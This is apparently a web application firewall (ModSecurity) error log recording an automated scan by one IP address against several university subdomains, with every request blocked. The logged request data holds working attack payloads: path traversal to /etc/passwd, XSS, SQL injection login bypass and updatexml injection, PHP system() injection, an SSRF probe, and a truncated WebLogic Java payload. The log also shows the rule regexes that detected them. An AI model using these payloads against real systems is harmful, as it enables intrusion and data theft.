[Tue Aug 29 11:35:16.397324 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAUZcHMAAABO"]
[Tue Aug 29 11:35:16.400219 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAVoCAQAAAAY"]
[Tue Aug 29 11:35:16.403632 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASEJZgAAAAE"]
[Tue Aug 29 11:35:16.404498 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATPtUYAAAAM"]
[Tue Aug 29 11:35:16.404795 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATzVKUAAAAx"]
[Tue Aug 29 11:35:16.404942 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVJXmMAAAAA"]
[Tue Aug 29 11:35:17.408924 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hcCo-f0AAATOA-cAAAAH"]
[Tue Aug 29 11:35:17.419109 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11hcCo-f0AAATxvZwAAAAw"]
[Tue Aug 29 11:35:18.427404 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAASEJZsAAAAE"]
[Tue Aug 29 11:35:18.432875 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAT@Kw4AAAA2"]
[Tue Aug 29 11:35:18.461455 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hsCo-f0AAAT9PQkAAAA1"]
[Tue Aug 29 11:35:18.472269 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAVWQBAAAAAV"]
[Tue Aug 29 11:35:18.473878 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAVmuK0AAAAT"]
[Tue Aug 29 11:35:18.475282 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAARdiUkAAAAK"]
[Tue Aug 29 11:35:18.488571 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAASHh@8AAAAD"]
[Tue Aug 29 11:35:18.503441 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAATQXj0AAAAO"]
[Tue Aug 29 11:35:18.510285 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAT@KxAAAAA2"]
[Tue Aug 29 11:35:18.529642 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAVmuK8AAAAT"]
[Tue Aug 29 11:35:18.731416 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAARdiUwAAAAK"]
[Tue Aug 29 11:35:18.753122 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAPLwLwAAAAX"]
[Tue Aug 29 11:35:19.305716 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAUUZ90AAABK"]
[Tue Aug 29 11:35:19.307738 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11h8Co-f0AAAT9PQoAAAA1"]
[Tue Aug 29 11:35:19.312295 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAATavwwAAAAg"]
[Tue Aug 29 11:35:19.314575 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAATxvZ8AAAAw"]
[Tue Aug 29 11:35:19.319739 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAVsUb4AAAAb"]
[Tue Aug 29 11:35:19.354986 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11h8Co-f0AAAUQ7uoAAABH"]
